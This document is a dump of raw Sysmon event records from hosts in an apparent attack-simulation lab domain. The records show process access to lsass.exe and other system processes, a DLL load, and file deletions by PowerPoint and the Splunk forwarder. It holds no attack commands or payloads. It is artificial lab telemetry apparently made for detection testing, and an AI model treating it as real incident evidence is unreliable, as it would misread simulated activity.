14:58:58.434{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EC32-607E-620F-00000000BB01}5848C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081343Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:58.434{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EC32-607E-620F-00000000BB01}5848C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000081342Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:58.434{A7A01FEF-EC32-607E-620F-00000000BB01}5848C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000081341Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:58.419{A7A01FEF-EBCF-607E-C00B-00000000BB01}65486336C:\Windows\system32\conhost.exe{A7A01FEF-EC32-607E-620F-00000000BB01}5848C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081340Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:58.419{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC32-607E-620F-00000000BB01}5848C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081339Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:58.419{A7A01FEF-EBCF-607E-BF0B-00000000BB01}44886480C:\Windows\Microsoft.NET\Framework64\v4.0.30319\NGenTask.exe{A7A01FEF-EC32-607E-620F-00000000BB01}5848C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.dll+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.DLL+35491|UNKNOWN(00007FF803265A07) 10341000x800000000000000081338Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:58.075{A7A01FEF-C0A6-607E-8105-00000000BB01}8362600C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081337Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:58.075{A7A01FEF-C0A6-607E-8105-00000000BB01}8365152C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62840|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081336Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:58.075{A7A01FEF-C0A6-607E-8105-00000000BB01}8365152C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000050699Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:58.783{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33677A48F407D8A666C987C5B2B90600,SHA256=0BB3A134B512E2D96C075484F60079AD9D5131839415514F3F613847C4A88383,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000050698Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:58.268{85C0FFC9-EC32-607E-F506-00000000BB01}12362216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050697Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:58.158{85C0FFC9-B85D-607E-9B00-00000000BB01}37722740C:\Windows\system32\conhost.exe{85C0FFC9-EC32-607E-F506-00000000BB01}1236C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050696Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:58.158{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050695Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:58.158{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050694Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:58.158{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050693Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:58.158{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050692Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:58.158{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050691Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:58.158{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050690Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:58.158{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050689Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:58.158{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050688Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:58.158{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050687Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:58.158{85C0FFC9-B7EC-607E-0500-00000000BB01}416532C:\Windows\system32\csrss.exe{85C0FFC9-EC32-607E-F506-00000000BB01}1236C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000050686Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:58.158{85C0FFC9-B85C-607E-9700-00000000BB01}30763836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{85C0FFC9-EC32-607E-F506-00000000BB01}1236C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000050685Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:58.161{85C0FFC9-EC32-607E-F506-00000000BB01}1236C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{85C0FFC9-B7EC-607E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000050684Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:58.158{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=885F58FBDDA0FFFBFEEDB5F31AA7312C,SHA256=55E25F5991800C0A6E0D77266629D503A7EF5A3C91A416BC7FE52D43397430F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050683Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:58.158{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A80183F4D62D0FC981ED0D0E0245A7A3,SHA256=4A839912809E86D36B7C06830A269E91B19ACA3F9A119B66A7320C0626970085,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081449Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.809{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1EEC73D61016A411E294902770600302,SHA256=63709E2BAF5BDFFA0BCB1782D828145DAB406766DEEA85555D53A625C55324EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081448Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.809{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F210802818295D7C8614C0294CE0E233,SHA256=44C9D6D1A46AD6F898574BC16160696916B16C280D7E427BD56906D9306DA86A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081447Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.325{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\cab4198.tmpMD5=9AED2FBBB427D6FA1A4C0D8909CB3F3F,SHA256=8FBA95D2C1904DFD921417CE8829FA9198CB650E7B1C0E7344743A7007BC22F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081446Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.263{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\cab41C5.tmpMD5=8867BDF5FC754DA9DA6F5BA341334595,SHA256=42323DD1D3E88C3207E16E0C95CA1048F2E4CD66183AD23B90171DA381D37B58,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081445Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.247{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\cab41F2.tmpMD5=F256ACA509B4C6C0144D278C7036B0A8,SHA256=AD26761D59F1FA9783C2F49184A2E8FE55FCD46CD3C49FFC099C02310649DC67,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081444Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.247{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\cab4197.tmpMD5=A6DE20BA06CD7C8AAB98F8C03BBD49F7,SHA256=AD50810112E08B981E967A5984DAB3DA6C4AAA890316BA38D44F39D80CCBB4E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081443Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.247{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\cab4193.tmpMD5=D7751432D989378FF1072BE65D877256,SHA256=A1ACF9D982A2531697766E894FAAB8AD73690E87EC341097FB0F5682E1B76E21,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081442Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.247{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\TCD41F3.tmp\content.infMD5=FB2CC12691A46374B7E41C7717EA840C,SHA256=511CC0AD1D792722E928A7FF0A99EA09125D47F6F63381BB9E7B57336A7CAA43,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081441Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:59.247{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496ATTACKRANGE\AdministratorC:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Users\ADMINI~1\AppData\Local\Temp\cab419C.tmpMD5=BEB12A0464D096CA33BAEA4352CE800F,SHA256=A44166F5C9F2553555A43586BA5DB1C1DE54D72D308A48268F27C6A00076B1CA,IMPHASH=00000000000000000000000000000000falsetrue 